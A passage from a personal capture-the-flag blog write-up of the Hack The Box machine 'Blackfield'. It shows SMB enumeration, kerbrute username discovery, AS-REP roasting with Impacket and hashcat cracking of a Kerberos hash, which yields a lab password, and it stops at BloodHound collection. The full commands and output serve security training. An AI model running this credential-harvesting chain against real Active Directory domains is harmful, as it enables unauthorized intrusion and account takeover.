title: Hack The Box - blackfield (dumping hashes from a Volume Shadow Copy) author: World'sEnd layout: true categories: Internal network security tags:
• Target-practice diary
If you want to climb to the peak, don't take the rainbow for a ladder.
Hack The Box - blackfield:
# Nmap 7.92 scan initiated Fri Apr 22 22:52:15 2022 as: nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.26s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-22 22:03:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-time:
| date: 2022-04-22T22:04:30
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 22 23:05:14 2022 -- 1 IP address (1 host up) scanned in 778.49 seconds
DNS:
Nmap enumerated some ports for me, plus a domain that matches the box's name: BLACKFIELD.local0. Why the trailing 0? I can try to check:
$ dig 10.10.10.192 BLACKFIELD.local
; <<>> DiG 9.18.0-2-Debian <<>> 10.10.10.192 BLACKFIELD.local
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 22432
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;10.10.10.192. IN A
;; Query time: 4 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Fri Apr 22 23:09:27 CST 2022
;; MSG SIZE rcvd: 41
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39765
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 84e1372c44b5b53c7103d16d6262c57586faa8e2fe3ccbf5 (good)
;; QUESTION SECTION:
;BLACKFIELD.local. IN A
;; AUTHORITY SECTION:
. 1800 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022042200 1800 900 604800 86400
;; Query time: 24 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Fri Apr 22 23:09:27 CST 2022
;; MSG SIZE rcvd: 148
With or without the 0 the result looks the same. I can check whether the target allows an anonymous zone transfer; I have never had one succeed, but I try it every time, because when it does work the payoff is very attractive:
$ dig axfr @10.10.10.192 BLACKFIELD.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.192 BLACKFIELD.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
As expected, it doesn't.
RPC:
Kerberos on port 88 gives me too little to go on for now, so I'll set it aside; I think collecting more user information is more useful at this point:
$ rpcclient -U "" 10.10.10.192 -N
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
Well, RPC doesn't work either.
SMB:
CrackMapExec is a post-exploitation tool that automates tasks such as password spraying, enumerating shares, checking for local admin access and executing commands on target machines. By default it identifies the operating system, hostname, domain name, SMB version and whether SMB signing is enabled. Kali Linux ships it by default:
$ crackmapexec smb 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
Windows 10.0 Build 17763 x64 is Windows Server 2019. I can list the SMB shares:
$ smbclient -N -L //10.10.10.192
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
It seems it doesn't want me accessing some of the default shares:
$ smbclient //10.10.10.192/NETLOGON
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
$ smbclient //10.10.10.192/SYSVOL
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> DIR
NT_STATUS_ACCESS_DENIED listing \*
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
As for non-default SMB shares, there are only forensic and profiles$:
$ smbclient //10.10.10.192/forensic
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ^C
I can't access forensic for now either, but profiles$ does let me in, though it seems a little too enthusiastic:
$ smbclient //10.10.10.192/profiles$
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 4 00:47:12 2020
.. D 0 Thu Jun 4 00:47:12 2020
AAlleni D 0 Thu Jun 4 00:47:11 2020
ABarteski D 0 Thu Jun 4 00:47:11 2020
ABekesz D 0 Thu Jun 4 00:47:11 2020
ABenzies D 0 Thu Jun 4 00:47:11 2020
ABiemiller D 0 Thu Jun 4 00:47:11 2020
AChampken D 0 Thu Jun 4 00:47:11 2020
ACheretei D 0 Thu Jun 4 00:47:11 2020
ACsonaki D 0 Thu Jun 4 00:47:11 2020
AHigchens D 0 Thu Jun 4 00:47:11 2020
AJaquemai D 0 Thu Jun 4 00:47:11 2020
AKlado D 0 Thu Jun 4 00:47:11 2020
AKoffenburger D 0 Thu Jun 4 00:47:11 2020
AKollolli D 0 Thu Jun 4 00:47:11 2020
AKruppe D 0 Thu Jun 4 00:47:11 2020
AKubale D 0 Thu Jun 4 00:47:11 2020
ALamerz D 0 Thu Jun 4 00:47:11 2020
AMaceldon D 0 Thu Jun 4 00:47:11 2020
AMasalunga D 0 Thu Jun 4 00:47:11 2020
ANavay D 0 Thu Jun 4 00:47:11 2020
ANesterova D 0 Thu Jun 4 00:47:11 2020
ANeusse D 0 Thu Jun 4 00:47:11 2020
AOkleshen D 0 Thu Jun 4 00:47:11 2020
APustulka D 0 Thu Jun 4 00:47:11 2020
ARotella D 0 Thu Jun 4 00:47:11 2020
ASanwardeker D 0 Thu Jun 4 00:47:11 2020
AShadaia D 0 Thu Jun 4 00:47:11 2020
ASischo D 0 Thu Jun 4 00:47:11 2020
ASpruce D 0 Thu Jun 4 00:47:11 2020
ATakach D 0 Thu Jun 4 00:47:11 2020
ATaueg D 0 Thu Jun 4 00:47:11 2020
ATwardowski D 0 Thu Jun 4 00:47:11 2020
audit2020 D 0 Thu Jun 4 00:47:11 2020
AWangenheim D 0 Thu Jun 4 00:47:11 2020
AWorsey D 0 Thu Jun 4 00:47:11 2020
AZigmunt D 0 Thu Jun 4 00:47:11 2020
BBakajza D 0 Thu Jun 4 00:47:11 2020
BBeloucif D 0 Thu Jun 4 00:47:11 2020
BCarmitcheal D 0 Thu Jun 4 00:47:11 2020
BConsultant D 0 Thu Jun 4 00:47:11 2020
BErdossy D 0 Thu Jun 4 00:47:11 2020
BGeminski D 0 Thu Jun 4 00:47:11 2020
BLostal D 0 Thu Jun 4 00:47:11 2020
BMannise D 0 Thu Jun 4 00:47:11 2020
BNovrotsky D 0 Thu Jun 4 00:47:11 2020
BRigiero D 0 Thu Jun 4 00:47:11 2020
BSamkoses D 0 Thu Jun 4 00:47:11 2020
BZandonella D 0 Thu Jun 4 00:47:11 2020
CAcherman D 0 Thu Jun 4 00:47:12 2020
CAkbari D 0 Thu Jun 4 00:47:12 2020
CAldhowaihi D 0 Thu Jun 4 00:47:12 2020
CArgyropolous D 0 Thu Jun 4 00:47:12 2020
CDufrasne D 0 Thu Jun 4 00:47:12 2020
CGronk D 0 Thu Jun 4 00:47:11 2020
Chiucarello D 0 Thu Jun 4 00:47:11 2020
Chiuccariello D 0 Thu Jun 4 00:47:12 2020
CHoytal D 0 Thu Jun 4 00:47:12 2020
CKijauskas D 0 Thu Jun 4 00:47:12 2020
CKolbo D 0 Thu Jun 4 00:47:12 2020
CMakutenas D 0 Thu Jun 4 00:47:12 2020
CMorcillo D 0 Thu Jun 4 00:47:11 2020
CSchandall D 0 Thu Jun 4 00:47:12 2020
CSelters D 0 Thu Jun 4 00:47:12 2020
CTolmie D 0 Thu Jun 4 00:47:12 2020
DCecere D 0 Thu Jun 4 00:47:12 2020
DChintalapalli D 0 Thu Jun 4 00:47:12 2020
DCwilich D 0 Thu Jun 4 00:47:12 2020
DGarbatiuc D 0 Thu Jun 4 00:47:12 2020
DKemesies D 0 Thu Jun 4 00:47:12 2020
DMatuka D 0 Thu Jun 4 00:47:12 2020
DMedeme D 0 Thu Jun 4 00:47:12 2020
DMeherek D 0 Thu Jun 4 00:47:12 2020
DMetych D 0 Thu Jun 4 00:47:12 2020
DPaskalev D 0 Thu Jun 4 00:47:12 2020
DPriporov D 0 Thu Jun 4 00:47:12 2020
DRusanovskaya D 0 Thu Jun 4 00:47:12 2020
DVellela D 0 Thu Jun 4 00:47:12 2020
DVogleson D 0 Thu Jun 4 00:47:12 2020
DZwinak D 0 Thu Jun 4 00:47:12 2020
EBoley D 0 Thu Jun 4 00:47:12 2020
EEulau D 0 Thu Jun 4 00:47:12 2020
EFeatherling D 0 Thu Jun 4 00:47:12 2020
EFrixione D 0 Thu Jun 4 00:47:12 2020
EJenorik D 0 Thu Jun 4 00:47:12 2020
EKmilanovic D 0 Thu Jun 4 00:47:12 2020
ElKatkowsky D 0 Thu Jun 4 00:47:12 2020
EmaCaratenuto D 0 Thu Jun 4 00:47:12 2020
EPalislamovic D 0 Thu Jun 4 00:47:12 2020
EPryar D 0 Thu Jun 4 00:47:12 2020
ESachhitello D 0 Thu Jun 4 00:47:12 2020
ESariotti D 0 Thu Jun 4 00:47:12 2020
ETurgano D 0 Thu Jun 4 00:47:12 2020
EWojtila D 0 Thu Jun 4 00:47:12 2020
FAlirezai D 0 Thu Jun 4 00:47:12 2020
FBaldwind D 0 Thu Jun 4 00:47:12 2020
FBroj D 0 Thu Jun 4 00:47:12 2020
FDeblaquire D 0 Thu Jun 4 00:47:12 2020
FDegeorgio D 0 Thu Jun 4 00:47:12 2020
FianLaginja D 0 Thu Jun 4 00:47:12 2020
FLasokowski D 0 Thu Jun 4 00:47:12 2020
FPflum D 0 Thu Jun 4 00:47:12 2020
FReffey D 0 Thu Jun 4 00:47:12 2020
GaBelithe D 0 Thu Jun 4 00:47:12 2020
Gareld D 0 Thu Jun 4 00:47:12 2020
GBatowski D 0 Thu Jun 4 00:47:12 2020
GForshalger D 0 Thu Jun 4 00:47:12 2020
GGomane D 0 Thu Jun 4 00:47:12 2020
GHisek D 0 Thu Jun 4 00:47:12 2020
GMaroufkhani D 0 Thu Jun 4 00:47:12 2020
GMerewether D 0 Thu Jun 4 00:47:12 2020
GQuinniey D 0 Thu Jun 4 00:47:12 2020
GRoswurm D 0 Thu Jun 4 00:47:12 2020
GWiegard D 0 Thu Jun 4 00:47:12 2020
HBlaziewske D 0 Thu Jun 4 00:47:12 2020
HColantino D 0 Thu Jun 4 00:47:12 2020
HConforto D 0 Thu Jun 4 00:47:12 2020
HCunnally D 0 Thu Jun 4 00:47:12 2020
HGougen D 0 Thu Jun 4 00:47:12 2020
HKostova D 0 Thu Jun 4 00:47:12 2020
IChristijr D 0 Thu Jun 4 00:47:12 2020
IKoledo D 0 Thu Jun 4 00:47:12 2020
IKotecky D 0 Thu Jun 4 00:47:12 2020
ISantosi D 0 Thu Jun 4 00:47:12 2020
JAngvall D 0 Thu Jun 4 00:47:12 2020
JBehmoiras D 0 Thu Jun 4 00:47:12 2020
JDanten D 0 Thu Jun 4 00:47:12 2020
JDjouka D 0 Thu Jun 4 00:47:12 2020
JKondziola D 0 Thu Jun 4 00:47:12 2020
JLeytushsenior D 0 Thu Jun 4 00:47:12 2020
JLuthner D 0 Thu Jun 4 00:47:12 2020
JMoorehendrickson D 0 Thu Jun 4 00:47:12 2020
JPistachio D 0 Thu Jun 4 00:47:12 2020
JScima D 0 Thu Jun 4 00:47:12 2020
JSebaali D 0 Thu Jun 4 00:47:12 2020
JShoenherr D 0 Thu Jun 4 00:47:12 2020
JShuselvt D 0 Thu Jun 4 00:47:12 2020
KAmavisca D 0 Thu Jun 4 00:47:12 2020
KAtolikian D 0 Thu Jun 4 00:47:12 2020
KBrokinn D 0 Thu Jun 4 00:47:12 2020
KCockeril D 0 Thu Jun 4 00:47:12 2020
KColtart D 0 Thu Jun 4 00:47:12 2020
KCyster D 0 Thu Jun 4 00:47:12 2020
KDorney D 0 Thu Jun 4 00:47:12 2020
KKoesno D 0 Thu Jun 4 00:47:12 2020
KLangfur D 0 Thu Jun 4 00:47:12 2020
KMahalik D 0 Thu Jun 4 00:47:12 2020
KMasloch D 0 Thu Jun 4 00:47:12 2020
KMibach D 0 Thu Jun 4 00:47:12 2020
KParvankova D 0 Thu Jun 4 00:47:12 2020
KPregnolato D 0 Thu Jun 4 00:47:12 2020
KRasmor D 0 Thu Jun 4 00:47:12 2020
KShievitz D 0 Thu Jun 4 00:47:12 2020
KSojdelius D 0 Thu Jun 4 00:47:12 2020
KTambourgi D 0 Thu Jun 4 00:47:12 2020
KVlahopoulos D 0 Thu Jun 4 00:47:12 2020
KZyballa D 0 Thu Jun 4 00:47:12 2020
LBajewsky D 0 Thu Jun 4 00:47:12 2020
LBaligand D 0 Thu Jun 4 00:47:12 2020
LBarhamand D 0 Thu Jun 4 00:47:12 2020
LBirer D 0 Thu Jun 4 00:47:12 2020
LBobelis D 0 Thu Jun 4 00:47:12 2020
LChippel D 0 Thu Jun 4 00:47:12 2020
LChoffin D 0 Thu Jun 4 00:47:12 2020
LCominelli D 0 Thu Jun 4 00:47:12 2020
LDruge D 0 Thu Jun 4 00:47:12 2020
LEzepek D 0 Thu Jun 4 00:47:12 2020
LHyungkim D 0 Thu Jun 4 00:47:12 2020
LKarabag D 0 Thu Jun 4 00:47:12 2020
LKirousis D 0 Thu Jun 4 00:47:12 2020
LKnade D 0 Thu Jun 4 00:47:12 2020
LKrioua D 0 Thu Jun 4 00:47:12 2020
LLefebvre D 0 Thu Jun 4 00:47:12 2020
LLoeradeavilez D 0 Thu Jun 4 00:47:12 2020
LMichoud D 0 Thu Jun 4 00:47:12 2020
LTindall D 0 Thu Jun 4 00:47:12 2020
LYturbe D 0 Thu Jun 4 00:47:12 2020
MArcynski D 0 Thu Jun 4 00:47:12 2020
MAthilakshmi D 0 Thu Jun 4 00:47:12 2020
MAttravanam D 0 Thu Jun 4 00:47:12 2020
MBrambini D 0 Thu Jun 4 00:47:12 2020
MHatziantoniou D 0 Thu Jun 4 00:47:12 2020
MHoerauf D 0 Thu Jun 4 00:47:12 2020
MKermarrec D 0 Thu Jun 4 00:47:12 2020
MKillberg D 0 Thu Jun 4 00:47:12 2020
MLapesh D 0 Thu Jun 4 00:47:12 2020
MMakhsous D 0 Thu Jun 4 00:47:12 2020
MMerezio D 0 Thu Jun 4 00:47:12 2020
MNaciri D 0 Thu Jun 4 00:47:12 2020
MShanmugarajah D 0 Thu Jun 4 00:47:12 2020
MSichkar D 0 Thu Jun 4 00:47:12 2020
MTemko D 0 Thu Jun 4 00:47:12 2020
MTipirneni D 0 Thu Jun 4 00:47:12 2020
MTonuri D 0 Thu Jun 4 00:47:12 2020
MVanarsdel D 0 Thu Jun 4 00:47:12 2020
NBellibas D 0 Thu Jun 4 00:47:12 2020
NDikoka D 0 Thu Jun 4 00:47:12 2020
NGenevro D 0 Thu Jun 4 00:47:12 2020
NGoddanti D 0 Thu Jun 4 00:47:12 2020
NMrdirk D 0 Thu Jun 4 00:47:12 2020
NPulido D 0 Thu Jun 4 00:47:12 2020
NRonges D 0 Thu Jun 4 00:47:12 2020
NSchepkie D 0 Thu Jun 4 00:47:12 2020
NVanpraet D 0 Thu Jun 4 00:47:12 2020
OBelghazi D 0 Thu Jun 4 00:47:12 2020
OBushey D 0 Thu Jun 4 00:47:12 2020
OHardybala D 0 Thu Jun 4 00:47:12 2020
OLunas D 0 Thu Jun 4 00:47:12 2020
ORbabka D 0 Thu Jun 4 00:47:12 2020
PBourrat D 0 Thu Jun 4 00:47:12 2020
PBozzelle D 0 Thu Jun 4 00:47:12 2020
PBranti D 0 Thu Jun 4 00:47:12 2020
PCapperella D 0 Thu Jun 4 00:47:12 2020
PCurtz D 0 Thu Jun 4 00:47:12 2020
PDoreste D 0 Thu Jun 4 00:47:12 2020
PGegnas D 0 Thu Jun 4 00:47:12 2020
PMasulla D 0 Thu Jun 4 00:47:12 2020
PMendlinger D 0 Thu Jun 4 00:47:12 2020
PParakat D 0 Thu Jun 4 00:47:12 2020
PProvencer D 0 Thu Jun 4 00:47:12 2020
PTesik D 0 Thu Jun 4 00:47:12 2020
PVinkovich D 0 Thu Jun 4 00:47:12 2020
PVirding D 0 Thu Jun 4 00:47:12 2020
PWeinkaus D 0 Thu Jun 4 00:47:12 2020
RBaliukonis D 0 Thu Jun 4 00:47:12 2020
RBochare D 0 Thu Jun 4 00:47:12 2020
RKrnjaic D 0 Thu Jun 4 00:47:12 2020
RNemnich D 0 Thu Jun 4 00:47:12 2020
RPoretsky D 0 Thu Jun 4 00:47:12 2020
RStuehringer D 0 Thu Jun 4 00:47:12 2020
RSzewczuga D 0 Thu Jun 4 00:47:12 2020
RVallandas D 0 Thu Jun 4 00:47:12 2020
RWeatherl D 0 Thu Jun 4 00:47:12 2020
RWissor D 0 Thu Jun 4 00:47:12 2020
SAbdulagatov D 0 Thu Jun 4 00:47:12 2020
SAjowi D 0 Thu Jun 4 00:47:12 2020
SAlguwaihes D 0 Thu Jun 4 00:47:12 2020
SBonaparte D 0 Thu Jun 4 00:47:12 2020
SBouzane D 0 Thu Jun 4 00:47:12 2020
SChatin D 0 Thu Jun 4 00:47:12 2020
SDellabitta D 0 Thu Jun 4 00:47:12 2020
SDhodapkar D 0 Thu Jun 4 00:47:12 2020
SEulert D 0 Thu Jun 4 00:47:12 2020
SFadrigalan D 0 Thu Jun 4 00:47:12 2020
SGolds D 0 Thu Jun 4 00:47:12 2020
SGrifasi D 0 Thu Jun 4 00:47:12 2020
SGtlinas D 0 Thu Jun 4 00:47:12 2020
SHauht D 0 Thu Jun 4 00:47:12 2020
SHederian D 0 Thu Jun 4 00:47:12 2020
SHelregel D 0 Thu Jun 4 00:47:12 2020
SKrulig D 0 Thu Jun 4 00:47:12 2020
SLewrie D 0 Thu Jun 4 00:47:12 2020
SMaskil D 0 Thu Jun 4 00:47:12 2020
Smocker D 0 Thu Jun 4 00:47:12 2020
SMoyta D 0 Thu Jun 4 00:47:12 2020
SRaustiala D 0 Thu Jun 4 00:47:12 2020
SReppond D 0 Thu Jun 4 00:47:12 2020
SSicliano D 0 Thu Jun 4 00:47:12 2020
SSilex D 0 Thu Jun 4 00:47:12 2020
SSolsbak D 0 Thu Jun 4 00:47:12 2020
STousignaut D 0 Thu Jun 4 00:47:12 2020
support D 0 Thu Jun 4 00:47:12 2020
svc_backup D 0 Thu Jun 4 00:47:12 2020
SWhyte D 0 Thu Jun 4 00:47:12 2020
SWynigear D 0 Thu Jun 4 00:47:12 2020
TAwaysheh D 0 Thu Jun 4 00:47:12 2020
TBadenbach D 0 Thu Jun 4 00:47:12 2020
TCaffo D 0 Thu Jun 4 00:47:12 2020
TCassalom D 0 Thu Jun 4 00:47:12 2020
TEiselt D 0 Thu Jun 4 00:47:12 2020
TFerencdo D 0 Thu Jun 4 00:47:12 2020
TGaleazza D 0 Thu Jun 4 00:47:12 2020
TKauten D 0 Thu Jun 4 00:47:12 2020
TKnupke D 0 Thu Jun 4 00:47:12 2020
TLintlop D 0 Thu Jun 4 00:47:12 2020
TMusselli D 0 Thu Jun 4 00:47:12 2020
TOust D 0 Thu Jun 4 00:47:12 2020
TSlupka D 0 Thu Jun 4 00:47:12 2020
TStausland D 0 Thu Jun 4 00:47:12 2020
TZumpella D 0 Thu Jun 4 00:47:12 2020
UCrofskey D 0 Thu Jun 4 00:47:12 2020
UMarylebone D 0 Thu Jun 4 00:47:12 2020
UPyrke D 0 Thu Jun 4 00:47:12 2020
VBublavy D 0 Thu Jun 4 00:47:12 2020
VButziger D 0 Thu Jun 4 00:47:12 2020
VFuscca D 0 Thu Jun 4 00:47:12 2020
VLitschauer D 0 Thu Jun 4 00:47:12 2020
VMamchuk D 0 Thu Jun 4 00:47:12 2020
VMarija D 0 Thu Jun 4 00:47:12 2020
VOlaosun D 0 Thu Jun 4 00:47:12 2020
VPapalouca D 0 Thu Jun 4 00:47:12 2020
WSaldat D 0 Thu Jun 4 00:47:12 2020
WVerzhbytska D 0 Thu Jun 4 00:47:12 2020
WZelazny D 0 Thu Jun 4 00:47:12 2020
XBemelen D 0 Thu Jun 4 00:47:12 2020
XDadant D 0 Thu Jun 4 00:47:12 2020
XDebes D 0 Thu Jun 4 00:47:12 2020
XKonegni D 0 Thu Jun 4 00:47:12 2020
XRykiel D 0 Thu Jun 4 00:47:12 2020
YBleasdale D 0 Thu Jun 4 00:47:12 2020
YHuftalin D 0 Thu Jun 4 00:47:12 2020
YKivlen D 0 Thu Jun 4 00:47:12 2020
YKozlicki D 0 Thu Jun 4 00:47:12 2020
YNyirenda D 0 Thu Jun 4 00:47:12 2020
YPredestin D 0 Thu Jun 4 00:47:12 2020
YSeturino D 0 Thu Jun 4 00:47:12 2020
YSkoropada D 0 Thu Jun 4 00:47:12 2020
YVonebers D 0 Thu Jun 4 00:47:12 2020
YZarpentine D 0 Thu Jun 4 00:47:12 2020
ZAlatti D 0 Thu Jun 4 00:47:12 2020
ZKrenselewski D 0 Thu Jun 4 00:47:12 2020
ZMalaab D 0 Thu Jun 4 00:47:12 2020
ZMiick D 0 Thu Jun 4 00:47:12 2020
ZScozzari D 0 Thu Jun 4 00:47:12 2020
ZTimofeeff D 0 Thu Jun 4 00:47:12 2020
ZWausik D 0 Thu Jun 4 00:47:12 2020
5102079 blocks of size 4096. 1683487 blocks available
smb: \>
But all of these directories are empty:
smb: \> cd ZWausik\
smb: \ZWausik\> s
s: command abbreviation ambiguous
smb: \ZWausik\> dir
. D 0 Thu Jun 4 00:47:12 2020
.. D 0 Thu Jun 4 00:47:12 2020
5102079 blocks of size 4096. 1683359 blocks available
smb: \ZWausik\> cd ..
smb: \> cd ZMiick\
smb: \ZMiick\> dir
. D 0 Thu Jun 4 00:47:12 2020
.. D 0 Thu Jun 4 00:47:12 2020
5102079 blocks of size 4096. 1683355 blocks available
smb: \ZMiick\>
Oddly, these directory names look like personal names: KAmavisca doesn't translate, but a translator tells me Amavisca is a surname. I can try copying them into a wordlist and use it to enumerate usernames against Kerberos.
First I can try mounting the share on the local /mnt directory, which requires switching to root:
$ su root
密码:
# mount -t cifs //10.10.10.192/profiles$ /mnt
Password for worldisend@//10.10.10.192/profiles$:
$ touch user.txt
$ sudo ls -1 /mnt/ > user.txt
$ cat user.txt
AAlleni
ABarteski
..........
That gives me a username wordlist.
Kerberos enumeration:
Next I can enumerate usernames with kerbrute:
$ sudo ./kerbrute userenum -d blackfield.local ./user.txt --dc 10.10.10.192
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/23/22 - Ronnie Flathers @ropnop
2022/04/23 00:09:35 > Using KDC(s):
2022/04/23 00:09:35 > 10.10.10.192:88
2022/04/23 00:09:58 > [+] VALID USERNAME: audit2020@blackfield.local
2022/04/23 00:12:08 > [+] VALID USERNAME: support@blackfield.local
2022/04/23 00:12:08 > [+] VALID USERNAME: svc_backup@blackfield.local
2022/04/23 00:12:40 > Done! Tested 314 usernames (3 valid) in 184.849 seconds
I can extract the valid names:
audit2020
support
svc_backup
I can use /impacket-0.9.24/examples/GetNPUsers.py to enumerate these users' AS-REP hashes:
$ ./posttool/impacket-0.9.24/examples/GetNPUsers.py 'blackfield.local/' -usersfile ./user.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
I successfully obtained a hash for the support user:
$ cat hashes.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:5854f53c662b7bb4e4a4cdfd7ebc05d4$4aac3b42f477d32a10ef1fa40e8ede2cb818b3f4a5562c2f348aefb1d1a913119bcc9b4f836598a3afba64a2a17e227043ddcee34ac8e6667cc4ca8d3e8f6dd3a861fc2084d5f46a4754c41c551716473bdee459abe64164ddd1d1758a4b977fb98a9b71e5493f8297a064125cff6fce8aa1c106d6aed6f1441093ac9c8a0cb8deef3dce2583dae8b27e9580a3a2831df29925a1ccb428e42d360aa02b4f483aee94cf8ec118335865bde6ff6aee9d86da08781b00fe77dc40b1db6f45589f9ae63e3c063c7ec5a7411c0534d583719e8a50a3708e84d6a5008dd151d8100afa4baf094d72b86cdb95f6ea08a2845c4772608a20
I can try cracking it with hashcat:
$ hashcat -h | grep "AS-REP"
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
$ hashcat -m 18200 ./hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
......
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5asrep$23$support@BLACKFIELD.LOCAL:5854f53c662b7bb4e4a4cdfd7ebc05d4$4aac3b42f477d32a10ef1fa40e8ede2cb818b3f4a5562c2f348aefb1d1a913119bcc9b4f836598a3afba64a2a17e227043ddcee34ac8e6667cc4ca8d3e8f6dd3a861fc2084d5f46a4754c41c551716473bdee459abe64164ddd1d1758a4b977fb98a9b71e5493f8297a064125cff6fce8aa1c106d6aed6f1441093ac9c8a0cb8deef3dce2583dae8b27e9580a3a2831df29925a1ccb428e42d360aa02b4f483aee94cf8ec118335865bde6ff6aee9d86da08781b00fe77dc40b1db6f45589f9ae63e3c063c7ec5a7411c0534d583719e8a50a3708e84d6a5008dd151d8100afa4baf094d72b86cdb95f6ea08a2845c4772608a20:#00^BlackKnight
......
Started: Sat Apr 23 00:20:55 2022
Stopped: Sat Apr 23 00:21:16 2022
Continuing SMB enumeration:
I got the support user's password, #00^BlackKnight, but it doesn't seem to be meant for logging in:
$ evil-winrm -i 10.10.10.192 -u support -p '#00^BlackKnight'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
ls
dir
And it seems that identity still isn't allowed to access some things:
$ smbclient //10.10.10.192/forensic -U support%#00^BlackKnight
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
Well, I can at least now reach some of the directories that were restricted at first:
$ smbclient //10.10.10.192/SYSVOL -U support%#00^BlackKnight
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 19:13:05 2020
.. D 0 Sun Feb 23 19:13:05 2020
BLACKFIELD.local Dr 0 Sun Feb 23 19:13:05 2020
5102079 blocks of size 4096. 1683607 blocks available
smb: \> cd BLACKFIELD.local\
smb: \BLACKFIELD.local\> DIR
. D 0 Sun Feb 23 19:19:28 2020
.. D 0 Sun Feb 23 19:19:28 2020
DfsrPrivate DHSr 0 Sun Feb 23 19:19:28 2020
Policies D 0 Sun Feb 23 19:13:14 2020
scripts D 0 Sun Feb 23 19:13:05 2020
5102079 blocks of size 4096. 1683575 blocks available
But the files in there don't seem to help me at all, and some directories still won't let me run dir. I tried requesting a service ticket as the current user; if that succeeded I might be able to crack a service account's password, but it doesn't look like it:
$ ./GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
No entries found!
Enumerating domain information:
However, I found a BloodHound ingestor, BloodHound.py, which can collect data from the target domain remotely with a given set of user credentials:
$ ./bloodhound.py -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
......
When it finishes it writes the corresponding JSON files to the current directory:
$ mkdir ../../../json
$ mv 20* ../../../json
$ cd ../../../json
$ ls
20220423095228_computers.json 20220423095228_domains.json 20220423095228_groups.json 20220423095228_users.json
I can load these into BloodHound. First I locate the node for the current user, support, and click it; Node Info lists details about the user along with some predefined queries:
